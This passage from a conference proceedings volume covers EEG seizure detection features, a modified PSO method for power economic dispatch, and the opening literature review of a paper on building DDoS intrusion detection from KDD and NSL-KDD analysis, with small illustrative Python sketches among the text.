Sriraam and Raghu [1] utilized the Bern-Barcelona EEG database to identify focal
and non-focal seizures. EEG signals are segmented in the window of 10 s duration.
The authors pre-processed the signal using a fourth-order Butterworth band-pass filter
in the frequency range of 0.5–150 Hz. Feature extraction in the time and frequency
domains is carried out, along with information-theoretic and statistical features.
The SVM classification algorithm achieves the highest sensitivity, specificity, and
classification accuracy. A real-time microcontroller-based prototype is employed by
Chakrabarti et al. [2]. Low-power consumption, quick and accurate seizure detection,
and easy software compatibility are the few attributes of the proposed prototype. The
EEG signals are pre-processed using LPF and features are extracted using a discrete
wavelet transform (DWT). Daubechies, Symlet, Bi-orthogonal, and Coiflet mother
wavelets are employed for multi-resolution analysis of the signals. Results reveal
high classification accuracy using the ANN classifier. Zabihi et al. [3] presented a
patient-dependent approach employing a two-layer classification to detect seizures
using linear discriminant analysis and artificial neural network. Selvakumari et al.
[10] carried out their work on 12 channels placed in parietal and occipital lobes. The
work presented by them is patient-dependent and obtains an accuracy of 95.63%.
Correa et al. [4] developed an algorithm for real-time and offline modes, based on
adaptive filters, signal averaging, and thresholds for seizure detection. Sadeghzadeh
et al. [5] introduced a two-level patient-dependent approach for seizure detection,
using three-level feature extractions from the pre-ictal stage of the EEG signal. These
signals are matched with the pre-defined threshold value to conclude the likelihood of
seizure occurrence. Fasil et al. [6] removed the unwanted noise from the EEG signals
using a Butterworth filter, applied differential decomposition methods for signal
decomposition, and then extracted log-entropy and signal energy. The authors obtained
an accuracy of 86% with the SVM algorithm. Raghu et al. [7] presented a study
of the dynamic characteristics of EEG signals. The authors applied a modified version
of DWT, maximal overlap discrete wavelet transform to analyse EEG signals. The
highest obtained classification accuracy for CHB-MIT is 94.51%. Raghu and Sriraam
[8] extracted features in time as well as frequency domain. The SVM classifier
yields good results with an accuracy of 96.1%. Yang et al. [9] developed a novel
patient-independent seizure detection method and also performed a patient-dependent
analysis. Results reveal better classification accuracy for the patient-dependent
study [10], but such models are difficult to apply to new patients.
Medical experts diagnose epilepsy by visually analyzing and inspecting the
EEG recordings. This manual process of analyzing the signal is time-consuming,
tedious, and susceptible to human error, a problem aggravated by the rise of
5 million new epileptic patients per year [9]. These issues may be effectively
resolved using efficient feature
extraction and machine learning-based classification techniques. Further, scalp EEG
measures brain activity from the scalp surface in an easier, more reliable, and more
affordable way than invasive EEG recordings. Therefore, in this work, the
non-invasive CHB MIT scalp EEG dataset is used to design a patient-independent
epileptic seizure detection model. Two novel patient-independent, segment-based,
time-domain feature extraction techniques, the “Max–Min” and “Variation” methods,
are proposed. The feature extraction techniques are designed by considering the ictal
and interictal stages of a seizure. Various ML techniques are considered to classify
the signals into the seizure or non-seizure category. A performance comparison of the
results obtained using various ML algorithms is also performed in this study. It is
observed that the results obtained using the proposed novel techniques are better in
comparison to the conventional methods. Further, the performance of the proposed
epilepsy detection system is analyzed using various performance metrics.
The organization of this paper is as follows: Section 2 explains the
suggested methodology of feature extraction and classification. Section 3 presents
the obtained results and discussion of this work. Lastly, Sect. 4 presents the
conclusion of this work.
2 Methodology
The epileptic seizure detection system suggested in this research work comprises
signal acquisition, pre-processing, feature extraction and selection, and classification
stages. Figure 1 shows a schematic illustration of the epilepsy detection model.
The publicly available CHB MIT dataset consisting of scalp EEG recordings
from 22 subjects is considered for experimentation. The database is collected from 5
males and 17 females in the age group of 3–22 years and 1.5–19 years, respectively.
The recording of the scalp EEG is done using the international 10–20 electrode
position standards. The pre-processing of data involves the removal of unwanted
signal, power-line noise, and artifacts from the EEG signal. The CHB-MIT scalp
EEG data is pre-processed using the 4th-order Butterworth band-pass filter in the
frequency band of 0.5–32 Hz. This study includes all the channels except the duplicate
EEG channel “T8-P8.” The EEG signal is segmented into small bits by applying a
non-overlapping sliding window of 6 s duration each [9]. The recordings for patients
12 and 16 are excluded in this study, owing to their short interictal and ictal regions.
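The pre-processing and segmentation steps described above can be sketched as follows. This is a minimal illustration, not the authors' code: the 256 Hz sampling rate is the CHB-MIT standard, while the synthetic data and array shapes are assumptions.

```python
import numpy as np
from scipy.signal import butter, filtfilt

FS = 256          # CHB-MIT scalp EEG sampling rate (Hz)
WINDOW_SEC = 6    # non-overlapping segment length used in this work

def bandpass(eeg, low=0.5, high=32.0, fs=FS, order=4):
    """4th-order Butterworth band-pass filter (0.5-32 Hz), applied
    forward-backward (zero phase) along the samples axis of a
    (channels, samples) array."""
    b, a = butter(order, [low / (fs / 2), high / (fs / 2)], btype="band")
    return filtfilt(b, a, eeg, axis=-1)

def segment(eeg, fs=FS, window_sec=WINDOW_SEC):
    """Split a (channels, samples) array into non-overlapping 6 s windows.
    Returns an array of shape (n_windows, channels, window_samples);
    a trailing partial window is discarded here."""
    step = fs * window_sec
    n_windows = eeg.shape[-1] // step
    trimmed = eeg[:, : n_windows * step]
    return trimmed.reshape(eeg.shape[0], n_windows, step).swapaxes(0, 1)

# Example on synthetic data: 22 channels, 40 s of signal -> 6 full windows
eeg = np.random.randn(22, 40 * FS)
windows = segment(bandpass(eeg))
print(windows.shape)  # (6, 22, 1536)
```

Note that the paper counts ⌈40/6⌉ = 7 windows per 40 s seizure, so the final partial window is apparently retained there; the sketch above keeps only full windows for simplicity.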
The seizure regions are characterized by oscillatory patterns, sharp spikes, and a
rapid sequence of the fast action potential in the EEG signal. These characteristics
are used to design an epileptic seizure detection model. In this work, the EEG scalp
database is used to extract “Max–Min” and “Variation” based features. These feature
sets are derived using segment-based approaches [9, 10]. The operation involves
the study of epileptiform activity for seizure analysis. The ictal and interictal signal
segments are considered in the analysis. The ictal regions are the regions associated
with the occurrence of seizure attacks. The region in the EEG signal that occurs
between the seizures is known as the interictal region.
2.1 Max–Min Method

The Max–Min method is a variant of the method proposed by Yang et al. [9]. However,
this method focuses on extracting the maximum and minimum values from the ictal
and interictal regions. The Max–Min procedure for feature extraction is given as
follows:
1. The ictal and the interictal region are divided into smaller windows using a
non-overlapping window of 6 s each in duration.
2. The maximum (pi ) and minimum (qi ) values corresponding to each 6 s region
for all channels are retrieved and stored as multiple pairs of maximum and
minimum values corresponding to the ictal and interictal region.
3. A one-dimensional array (pqabs ) is created that gives the absolute difference
between the maximum and minimum values.
pqabs = [|p1 − q1|, |p2 − q2|, |p3 − q3|, …, |pi − qi|] (1)
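The three steps above can be sketched compactly; the (n_windows, channels, samples) window layout is an assumption, not the paper's data format.

```python
import numpy as np

def max_min_features(windows):
    """Max-Min feature extraction: for each 6 s window of each channel,
    take the maximum p_i and minimum q_i, and return the absolute
    differences |p_i - q_i| as a 1-D array (cf. Eq. 1).
    `windows` has shape (n_windows, channels, samples)."""
    p = windows.max(axis=-1)         # maxima, shape (n_windows, channels)
    q = windows.min(axis=-1)         # minima, same shape
    return np.abs(p - q).ravel()     # pq_abs

# e.g. chb01_03: 7 windows x 22 channels -> 154 values, matching the text
windows = np.random.randn(7, 22, 1536)
pq_abs = max_min_features(windows)
print(pq_abs.shape)  # (154,)
```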
2.2 Variation Method

The Variation method is an extension of the Max–Min method and uses the maximum (pi)
and minimum (qi) values corresponding to the ictal and interictal regions. The mean of
the maximum values corresponding to the ictal and interictal regions is subtracted
from all maximum and minimum values. This method provides information about the
average maximum and minimum values for the seizure and non-seizure regions and the
difference between the mean value and the ictal and interictal regions. A total of
76,111 voltage values are calculated for all the subjects.
meanictal = (1/k) Σ_{i=0}^{k} pi (2)

meaninter = (1/k) Σ_{i=0}^{k} qi (3)
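One plausible reading of this description can be sketched as follows; the interpretation (deviation of each window's extremum from the region mean) and the example values are assumptions.

```python
import numpy as np

def variation_features(p, q):
    """Variation method (one plausible reading of the description):
    subtract the mean of the window maxima/minima from every maximum
    and minimum value, giving each window's deviation from the average
    level of its region (cf. Eqs. 2-3)."""
    dev_max = np.abs(p - p.mean())   # deviation from mean of maxima
    dev_min = np.abs(q - q.mean())   # deviation from mean of minima
    return dev_max, dev_min

p = np.array([4.0, 6.0, 5.0])    # window maxima (hypothetical values)
q = np.array([-3.0, -5.0, -4.0]) # window minima (hypothetical values)
dmax, dmin = variation_features(p, q)
print(dmax)  # [1. 1. 0.]
```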
2.3 Classification
A decision tree model is created by learning simple decision rules; it has low model
complexity and a fast running speed [9]. The scalable tree boosting algorithm (XGB)
is a faster-running version of the gradient boosting decision tree algorithm. The
performance of the ML classifiers is evaluated using the confusion matrix. Further,
the performance evaluation of the ML algorithms is carried out using accuracy,
Matthews correlation coefficient (MCC), sensitivity, Cohen’s Kappa metric, and
specificity [9].
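The five metrics can all be derived from the binary confusion matrix; a minimal sketch (the example counts are illustrative, not results from the paper):

```python
import math

def seizure_metrics(tp, tn, fp, fn):
    """Evaluation metrics used in this work, computed from the
    confusion-matrix counts of the binary seizure / non-seizure task."""
    n = tp + tn + fp + fn
    po = (tp + tn) / n                          # observed agreement (accuracy)
    pe = ((tp + fp) * (tp + fn) + (tn + fn) * (tn + fp)) / n ** 2
    mcc_den = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    return {
        "accuracy": po,
        "sensitivity": tp / (tp + fn),          # true-positive rate
        "specificity": tn / (tn + fp),          # true-negative rate
        "mcc": (tp * tn - fp * fn) / mcc_den,   # Matthews correlation coeff.
        "kappa": (po - pe) / (1 - pe),          # Cohen's Kappa
    }

m = seizure_metrics(tp=90, tn=85, fp=15, fn=10)  # hypothetical counts
print(round(m["accuracy"], 3), round(m["mcc"], 3))  # → 0.875 0.751
```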
3 Results and Discussion

The Max–Min method extracts the maximum and minimum values from the ictal
and interictal regions of the CHB-MIT EEG dataset. Then, the absolute difference
between the maximum and the minimum values is evaluated. Finally, the minimum,
maximum, mean, standard deviation, and variance values corresponding to all the
channels are calculated. For example, there are 7 seizure files and 35 non-seizure
files for subject chb01. The duration of the seizure files is taken as reference, and
the duration of the interictal region is chosen randomly such that it matches the
duration of the ictal region. Each ictal and interictal region is divided into
non-overlapping windows of 6 s each. The seizure duration for the chb01_03.edf file
is 40 s, so a pair of 22 × ⌈40/6⌉ = 154 maximum and minimum voltage values
corresponding to this file is obtained. Similarly, the voltage values corresponding to
all the EEG channels are calculated, resulting in a total of 38,044 pairs of voltage values.
Figure 2 graphically illustrates the proposed Max–Min feature extraction method.
The performance of the ML classifier using the Max–Min method is depicted in
Fig. 3. The graph shows that the highest accuracy of 97.82% is achieved using the
decision tree classifier.
Figure 4 graphically illustrates the concept of feature extraction using the Variation
method. The Variation method works on a principle similar to the Max–Min method. In
this method, the mean maximum values are calculated corresponding to the ictal and
interictal regions. Later, the absolute difference between the maximum value and the
mean value is calculated. Similarly, the absolute difference between the minimum and
the mean value is calculated.
Fig. 3 Seizure detection performance comparison of machine learning algorithms using
the Max–Min method
Fig. 5 Seizure detection performance comparison of machine learning algorithms using
the Variation method
Table 2 Comparative analysis of the performance metrics for the proposed seizure detection model

Method            ML algorithm  Accuracy (%)  Sensitivity (%)  Specificity (%)  MCC (%)  Kappa (%)
Max–Min method    Dtree         97.82         97.86            97.86            95.91    95.91
Variation method  XGB           92.40         95.03            95.03            85.02    84.90
4 Conclusions
The Max–Min method achieves the highest classification accuracy of 97.82% using the
decision tree classifier, while the Variation method achieves 92.40% accuracy using
the XGB algorithm. Thus, the Max–Min and Variation methods achieve classification
accuracies 11.55% and 2.52% greater than the methods discussed in [2, 9],
respectively. It is also revealed that the suggested methods use fewer than 5 features,
thus reducing the data dimension to a large extent. In future, other stages of seizures
may be classified with the help of integrated feature sets and various feature selection
and channel selection methods.
References
1. Sriraam, N., & Raghu, S. (2017). Classification of focal and non-focal epileptic seizures using
multi-features and SVM classifier. Journal of Medical Systems, 41(10), 1–14.
2. Chakrabarti, S., Swetapadma, A., Ranjan, A., & Pattnaik, P. K. (2020). Time domain imple-
mentation of pediatric epileptic seizure detection system for enhancing the performance of
detection and easy monitoring of pediatric patients. Biomedical Signal Processing and Control,
59, 101930.
3. Zabihi, M., Kiranyaz, S., Jäntti, V., Lipping, T., & Gabbouj, M. (2019). Patient-specific seizure
detection using nonlinear dynamics and nullclines. IEEE Journal of Biomedical and Health
Informatics, 24(2), 543–555.
4. Correa, A. G., Orosco, L. L., Diez, P., & Leber, E. L. (2019). Adaptive filtering for epileptic
event detection in the EEG. Journal of Medical and Biological Engineering, 39(6), 912–918.
5. Sadeghzadeh, H., Hosseini-Nejad, H., & Salehi, S. (2019). Real-time epileptic seizure predic-
tion based on online monitoring of pre-ictal features. Medical and Biological Engineering and
Computing, 57(11), 2461–2469.
6. Fasil, O. K., Rajesh, R., & Thasleema, T. M. (2018). Fusion of signal and differential signal
domain features for epilepsy identification in electroencephalogram signals. In Advances in
data and information sciences (pp. 127–135). Springer.
7. Raghu, S., Sriraam, N., Temel, Y., Rao, S. V., Hegde, A. S., & Kubben, P. L. (2019). Performance
evaluation of DWT based sigmoid entropy in time and frequency domains for automated
detection of epileptic seizures using SVM classifier. Computers in Biology and Medicine, 110,
127–143.
8. Raghu, S., & Sriraam, N. (2018). Classification of focal and non-focal EEG signals using
neighborhood component analysis and machine learning algorithms. Expert Systems with
Applications, 113, 18–32.
9. Yang, S., Li, B., Zhang, Y., Duan, M., Liu, S., Zhang, Y., Feng, X., Tan, R., Huang, L., & Zhou,
F. (2020). Selection of features for patient-independent detection of seizure events using scalp
EEG signals. Computers in Biology and Medicine, 119, 103671.
10. Selvakumari, R. S., Mahalakshmi, M., & Prashalee, P. (2019). Patient-specific seizure detection
method using hybrid classifier with optimized electrodes. Journal of Medical Systems, 43(5),
1–7.
Solution to Economic Dispatch Problem
Using Modified PSO Algorithm
Abstract This research paper proposes a novel approach, an extension of the PSO
algorithm, aimed at solving the economic dispatch problem. The economic dispatch
problem is overcome by minimizing the fuel cost incurred by the generating units.
Several constraints have been incorporated in the calculation of the overall operating
cost of power system operation. From the economic point of view, this has been a
matter of concern for most companies and needs to be solved.
1 Introduction
A power system comprises several power plants, and each power plant has several
generating units [1]. Daily load patterns show acute deviation between the peak and
off-peak hours because the community uses less electrical energy on Saturday than
on weekdays, and at a lower rate between midnight and early morning than during the
day. If enough generation to meet the peak is kept online all through the day, it is
likely that some of the units will be working near their minimum generating threshold
during the off-peak period. In most interconnected power systems, the power
requirement is primarily fulfilled by thermal power generation. Several operating
approaches can fulfill the required power demand, and it is recommended to use the
most favorable operating approach based on a financial measure. That is to say, the
decisive criterion in power system operation is to meet the power demand at the least
fuel cost. Furthermore, in order to provide first-rate electrical energy to consumers
in a secure and cost-effective manner, economic dispatch is considered to be one of
the best existing alternatives.
The major outcomes of the research are given as follows:
• This research aims at solving the economic dispatch problem.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 889
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_72
890 A. Singh and A. Khamparia
2 Unit Commitment
For regular system operations, the actual power output of each unit lies between its
upper and lower limits as follows (Eq. 2):

Pi,min ≤ Pi ≤ Pi,max (2)
Equilibrium is reached when the net electricity generation is equal to the overall
demand and the actual power loss in transmission lines (Eq. 3):
Σ_{i=1}^{n} Pi = D + Pl (3)
The operational range of online generators is constrained by their limits on ramp rate
[6]. Three potential scenarios occur while the generator units are online.
• The generating unit operates in a steady state.
• The generating unit increases its generation of power.
• The generating unit decreases its generation of power.
As generation increases (Eq. 4),

Pi(t) − Pi(t−1) ≤ URi (4)

and as generation decreases (Eq. 5),

Pi(t−1) − Pi(t) ≤ DRi (5)

where URi and DRi denote the ramp-up and ramp-down rate limits of unit i.
The economic dispatch problem deals with determining how much power each generating
unit should produce for a given power demand, under the condition of minimizing the
aggregate operational cost [7–11] (Eq. 6).
FT = F1 + F2 + F3 + ··· + FN = Σ_{i=1}^{N} Fi(Pi)

φ = 0 = Ploss + Pload − Σ_{i=1}^{N} Pi (6)

min FT = Σ_{i=1}^{n} (ai + bi Pi + ci Pi²) (7)
Here, FT denotes the overall fuel cost, Fi(Pi) denotes the cost of the ith generating
unit in $/h, Pi denotes the ith unit’s power in MW, and n denotes the total number of
generating units. Lastly, ai, bi, and ci are the cost coefficients of the ith generating unit.
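The quadratic cost model of Eq. 7 can be evaluated directly; the coefficients and dispatch below are illustrative, not values from the paper.

```python
def total_fuel_cost(P, a, b, c):
    """Total fuel cost (Eq. 7): F_T = sum_i (a_i + b_i*P_i + c_i*P_i^2),
    with P_i in MW and per-unit cost coefficients a_i, b_i, c_i."""
    return sum(ai + bi * Pi + ci * Pi ** 2
               for ai, bi, ci, Pi in zip(a, b, c, P))

# Hypothetical 3-unit system (coefficients are illustrative only)
a = [100.0, 120.0, 90.0]     # $/h
b = [2.0, 1.8, 2.2]          # $/MWh
c = [0.002, 0.0025, 0.0018]  # $/MW^2 h
P = [150.0, 200.0, 120.0]    # MW dispatched per unit
print(round(total_fuel_cost(P, a, b, c), 2))  # → 1404.92
```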
892 A. Singh and A. Khamparia
4 Particle Swarm Optimization

Particle swarm optimization (PSO) is motivated by the social behavior of birds [12,
13]. PSO is a very simple algorithm, yet a powerful one. Two principles underlie the
functioning of PSO: communication, i.e., sharing each particle’s measure with the
rest of the swarm, and learning. The algorithm aims at finding a global minimum.
The working of standard PSO is shown in Fig. 1.
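The working of standard global-best PSO can be sketched as follows; the parameter values are typical defaults, not the paper's settings.

```python
import random

def pso(f, dim, n_particles=30, iters=100, w=0.7, c1=1.5, c2=1.5,
        lo=-10.0, hi=10.0):
    """Minimal global-best PSO: each particle keeps a personal best, the
    swarm shares a global best, and velocities blend inertia (w),
    personal learning (c1) and global learning (c2)."""
    pos = [[random.uniform(lo, hi) for _ in range(dim)] for _ in range(n_particles)]
    vel = [[0.0] * dim for _ in range(n_particles)]
    pbest = [p[:] for p in pos]
    pbest_val = [f(p) for p in pos]
    g = min(range(n_particles), key=lambda i: pbest_val[i])
    gbest, gbest_val = pbest[g][:], pbest_val[g]
    for _ in range(iters):
        for i in range(n_particles):
            for d in range(dim):
                r1, r2 = random.random(), random.random()
                vel[i][d] = (w * vel[i][d]
                             + c1 * r1 * (pbest[i][d] - pos[i][d])
                             + c2 * r2 * (gbest[d] - pos[i][d]))
                # keep the particle inside the search bounds
                pos[i][d] = min(hi, max(lo, pos[i][d] + vel[i][d]))
            val = f(pos[i])
            if val < pbest_val[i]:
                pbest[i], pbest_val[i] = pos[i][:], val
                if val < gbest_val:
                    gbest, gbest_val = pos[i][:], val
    return gbest, gbest_val

# Sanity check on the sphere function: converges toward the minimum at 0
best, val = pso(lambda x: sum(xi ** 2 for xi in x), dim=2)
print(val)
```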
5 Proposed Approach
Nested PSO is a PSO variant that solves two or more problems concurrently [14–17].
In the algorithm used here, two PSOs are combined, or nested, to solve associated
concerns simultaneously: an outer and an inner PSO work together. The advantage is
that two objectives can be achieved easily, each being pursued while taking the other
goal into account. The working of the proposed methodology is shown in Fig. 2.
In each iteration, the PSO attempts to obtain ED generation solutions. To meet the
system demand and the realistic operating constraints of the generating units, which
include ramp-up and ramp-down rate limits and prohibited operating zones, economic
dispatch planning must conduct the optimized dispatch among the operating generating
units as stated in Table 1.
The PSO parameters include the inertia weight damping ratio (wdamp), the personal
learning coefficient and global learning coefficient (c1 and c2), and the constriction
coefficients (phi1 and phi2).
The loss coefficients can be defined with matrix B as follows.
B =
[  0.0017   0.0012   0.0007  −0.0001  −0.0005  −0.0002
   0.0012   0.0014   0.0009   0.0001  −0.0006  −0.0001
   0.0007   0.0009   0.0031   0.0000  −0.0010  −0.0006
  −0.0001   0.0001   0.0000   0.0024  −0.0006  −0.0008
  −0.0005  −0.0006  −0.0010  −0.0006   0.0129  −0.0002
  −0.0002  −0.0001  −0.0006  −0.0008  −0.0002   0.0150 ]
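Given the B coefficients above, the transmission loss for a candidate dispatch is commonly evaluated as P_loss = PᵀBP (the simplified Kron formula; the paper does not list B0/B00 terms). A sketch with a hypothetical dispatch vector:

```python
import numpy as np

# Loss coefficient matrix B from the paper
B = np.array([
    [ 0.0017,  0.0012,  0.0007, -0.0001, -0.0005, -0.0002],
    [ 0.0012,  0.0014,  0.0009,  0.0001, -0.0006, -0.0001],
    [ 0.0007,  0.0009,  0.0031,  0.0000, -0.0010, -0.0006],
    [-0.0001,  0.0001,  0.0000,  0.0024, -0.0006, -0.0008],
    [-0.0005, -0.0006, -0.0010, -0.0006,  0.0129, -0.0002],
    [-0.0002, -0.0001, -0.0006, -0.0008, -0.0002,  0.0150],
])

def transmission_loss(P, B):
    """Quadratic loss formula P_loss = P^T B P."""
    P = np.asarray(P)
    return float(P @ B @ P)

P = np.array([0.5, 0.6, 0.4, 0.7, 0.3, 0.5])  # hypothetical dispatch (p.u.)
print(transmission_loss(P, B))
```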
6 Results
Figure 3 shows the outer iterations for optimizing cost, and Fig. 4 shows the total
decrease in cost. The proposed technique uses ten outer iterations, each of which
consists of one hundred inner iterations. The optimized cost turned out to be
$197,320. The implementation was done in MATLAB on an Intel Core i5 at 3.4 GHz
with 4 GB of RAM.
7 Conclusion
In this paper, a modified PSO is utilized to solve the economic dispatch (ED)
problem. The proposed technique takes into account various constraints, including
ramp-up and ramp-down limits, and has given promising results.
References
1. Wood, A. J., & Wollenberg, B. F. (2007). Power generation, operation and control (2nd ed.).
Wiley.
2. Yu, X., & Zhang, X. (2014). Unit commitment using Lagrangian relaxation and particle swarm
optimization. International Journal of Electrical Power and Energy Systems.
3. Singh, A., & Kumar, S. (2016). Differential evolution: An overview. Advances in Intelligent
Systems and Computing. https://doi.org/10.1007/978-981-10-0448-3_17
4. Anand, H., Narang, N., & Dhillon, J. S. (2018). Profit based unit commitment using hybrid
optimization technique. Energy. https://doi.org/10.1016/j.energy.2018.01.138
5. Singh, A., & Khamparia, A. (2020). A hybrid whale optimization-differential evolution and
genetic algorithm based approach to solve unit commitment scheduling problem: WODEGA.
Sustainable Computing: Informatics and Systems. https://doi.org/10.1016/j.suscom.2020.
100442
6. Deka, D., & Datta, D. (2019). Optimization of unit commitment problem with ramp-rate
constraint and wrap-around scheduling. Electric Power Systems Research. https://doi.org/10.
1016/j.epsr.2019.105948
7. Xin-gang, Z., Ze-qi, Z., Yi-min, X., & Jin, M. (2020). Economic-environmental dispatch of
microgrid based on improved quantum particle swarm optimization. Energy. https://doi.org/
10.1016/j.energy.2020.117014
8. Wang, Q.-G., Ming, Yu., & Liu, J. (2020). An integrated solution for optimal generation oper-
ation efficiency through dynamic economic dispatch. Materials Today: Proceedings. https://
doi.org/10.1016/j.matpr.2020.03.535
9. Chen, Xu., Li, K., Bin, Xu., & Yang, Z. (2020). Biogeography-based learning particle swarm
optimization for combined heat and power economic dispatch problem. Knowledge-Based
Systems. https://doi.org/10.1016/j.knosys.2020.106463
10. Hailiang, Xu., Meng, Z., & Wang, Y. (2020). Economic dispatching of microgrid considering
renewable energy uncertainty and demand side response. Energy Reports. https://doi.org/10.
1016/j.egyr.2020.11.261
11. Goudarzi, A., Li, Y., & Xiang, Ji. (2020). A hybrid non-linear time-varying double-weighted
particle swarm optimization for solving non-convex combined environmental economic
dispatch problem. Applied Soft Computing. https://doi.org/10.1016/j.asoc.2019.105894
12. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of ICNN’95—
International Conference on Neural Networks, Perth, WA, Australia. https://doi.org/10.1109/
ICNN.1995.488968
13. Shi, Y., & Eberhart, R. (1998). A modified particle swarm optimizer. In 1998 IEEE Inter-
national Conference on Evolutionary Computation Proceedings. IEEE World Congress on
Computational Intelligence. https://doi.org/10.1109/ICEC.1998.699146
14. Eberhart, R. C., Groves, D. J., & Woodward, J. K. (2017). Deep swarm: Nested particle swarm
optimization. In 2017 IEEE Symposium Series on Computational Intelligence (SSCI), Honolulu,
HI. https://doi.org/10.1109/SSCI.2017.8280920
15. Adedeji, P. A., Akinlabi, S., Madushele, N., & Olatunji, O. O. (2020). Wind turbine power output
very short-term forecast: A comparative study of data clustering techniques in a PSO-ANFIS
model. Journal of Cleaner Production. https://doi.org/10.1016/j.jclepro.2020.120135
16. Zhang, X., Lin, Q., Mao, W., Liu, S., Dou, Z., & Liu, G. (2020). Hybrid particle Swarm and
Grey Wolf Optimizer and its application to clustering optimization. Applied Soft Computing.
https://doi.org/10.1016/j.asoc.2020.107061
17. Faisal, M., Hannan, M. A., Ker, P. J., Abd. Rahman, M. S., Begum, R. A., & Mahlia, T. M. I.
(2020). Particle swarm optimised fuzzy controller for charging–discharging and scheduling of
battery energy storage system in MG applications. Energy Reports. https://doi.org/10.1016/j.
egyr.2020.12.007
Recommendations for DDOS
Attack-Based Intrusion Detection System
Through Data Analysis
Abstract As internet usage increases day by day, it is essential to secure the
network from intruders, which indicates the necessity of constructing an intrusion
detection system. But one must know on what basis the intrusion detection system
(IDS) needs to be built. This thought led us to a new idea: forming recommendations
that can act as a basis for the development of an IDS. In this paper, we provide
recommendations by analyzing the standard datasets KDD and NSL-KDD. For the
analysis, MS-Excel was utilized.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 899
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_73
900 S. Pande et al.
along with TCP. UDP stands for user datagram protocol, which is considered a
substitute for TCP as a communication protocol. This protocol majorly concentrates
on packet-loss tolerance and low-latency links among various applications. ICMP
stands for Internet control message protocol, which is a supporting protocol of the
IP suite. It is used to generate success or error reports on operational data when
two parties communicate through network devices such as routers.
The major contributions of the proposed framework are as follows:
• Analyzing the various datasets such as KDD and NSL-KDD.
• Identifying the importance of NSL-KDD when compared with another mentioned
dataset.
• Analyzing the NSL-KDD thereby generating the recommendations which will be
helpful for further research.
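The label analysis that the paper performs in MS-Excel can equally be sketched in Python. This is an illustrative sketch, not the authors' procedure; the file name is a placeholder, and the assumed layout is NSL-KDD's usual one of 41 features followed by a label and a difficulty column.

```python
import csv
from collections import Counter

def label_counts(path):
    """Count records per traffic label in an NSL-KDD style CSV file
    (41 features, then the label, then a difficulty score)."""
    counts = Counter()
    with open(path, newline="") as f:
        for row in csv.reader(f):
            if len(row) >= 42:
                counts[row[41]] += 1   # label column
    return counts

# e.g. counts = label_counts("KDDTrain+.txt")
# DoS-family labels such as 'neptune' and 'smurf' typically dominate
# the attack records, alongside the 'normal' class.
```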
The paper is organized as follows: Section 2 discusses related work on intrusion
detection systems and threats. Section 3 discusses the analysis obtained from the
considered datasets and the recommendations based on that analysis. Section 4
presents the conclusions related to DOS threats and normal network activities.
2 Related Work
Ruan et al. [1] implemented visualization of the popular KDD dataset in the context
of the issues encountered while analyzing big data with its characteristic volume,
variety, and velocity. Sampling, tabular-weight, and hashing methodologies were
adopted to look into the depths of this dataset and recognize the cluster of normal
traffic and the other clusters with their corresponding attacks. Ji et al. [2]
identified the essentiality of IDS for securing the user’s network and proposed a
work to classify the various attacks in IDS using the KDD and NSL-KDD datasets
with the aid of an artificial neural network. The proposed work achieved good
overall accuracy but failed to achieve good accuracy when classifying the individual
categories of attacks. Ibrahimi and Ouaddane [3] pointed out
the importance of IDS and recognized that major research applies machine learning to
the data collected through IDS to categorize the various attacks in the dataset along
with the normal category. Their framework relied on popular dimensionality reduction
methodologies for big data, namely Linear Discriminant Analysis and Principal
Component Analysis, to identify the anomalies in the NSL-KDD dataset and thereby
improve the conditions for classifying the various attacks. Othman et al. [4]
observed that the data collected
through IDS is increasing in size as well as in the number of features, which gave
the idea of utilizing a big data framework for classifying the various attacks. The
proposed framework utilized Spark as the big data framework, a chi-square selector
for the selection of vital features from the big data, and a support vector machine
for the classification of attacks. The complete framework was based on the KDD
dataset. The training and prediction times are much lower for the proposed framework
than for an SVM-only framework or a logistic-regression-only framework.
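A scaled-down analogue of that pipeline can be sketched with scikit-learn in place of Spark: chi-square feature selection followed by an SVM. The dataset here is synthetic (not KDD), and all names and parameter values are illustrative assumptions.

```python
import numpy as np
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.pipeline import make_pipeline
from sklearn.svm import SVC

rng = np.random.default_rng(0)
# chi2 requires non-negative features; simulate 20 count-like features
X = rng.integers(0, 10, size=(200, 20)).astype(float)
y = (X[:, 3] > 4).astype(int)   # label driven by one informative feature

# Select the 5 highest-scoring features, then classify with an RBF SVM
model = make_pipeline(SelectKBest(chi2, k=5), SVC(kernel="rbf"))
model.fit(X, y)
print(model.score(X, y))
```

The chi-square selector ranks each feature's dependence on the class label, so the informative column is retained while most noise columns are discarded before the SVM is trained.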
Jia et al. [5] proposed a framework based on a customized deep neural network to
classify various attacks on the KDD and NSL-KDD datasets, which are obtained through
IDS. The customized deep neural network was framed with four hidden layers, and
through this framework an accuracy of 99.9% was achieved. The article claims that
this customized neural network can be used along with IDS to improve the security of
the network. Anand Sukumar et al. [6] proposed
a framework for identifying the kind of attack through IDS with the aid of a
combination of a genetic algorithm and the K-Means methodology. It was implemented
on the KDD99 dataset. Yet, the accuracy attained by the proposed model is minimal,
and better models already exist. Basnet et al. [7] explored the potential and
efficiency of deep learning methodology for the identification and classification of
kinds of intrusion. It was implemented on the CSE-CIC-IDS2018 dataset and was able
to achieve an accuracy of 99%. Kumar et al. [8]
proposed a unified model based on machine learning to integrate IDS and IoT. The
inspiration for this methodology was the observation that growing internet usage
among devices communicating over wireless networks increases susceptibility to
various security attacks. This framework was implemented using the UNSW-NB15
dataset, and the proposed model attained better accuracy than the other two
approaches, ENADS and DENDRON. Khonde and Ulagamuthalvi [9]
mainly focused on reducing the number of features in the standard KDD99 dataset; the
obtained data were then used for the classification of various types of attacks. The
classification was implemented using random forest methodology and attained about
95% accuracy. Pawlicki et al. [10] discussed the potential to degrade the efficiency
of an improved IDS during the testing phase by generating adversarial attacks using
four newly proposed procedures, and provided a way of detecting these threats. Both
the ANN and the four approaches for rendering adversarial attacks are presented with
the necessary context. The recent detection system is comprehensive, and the obtained
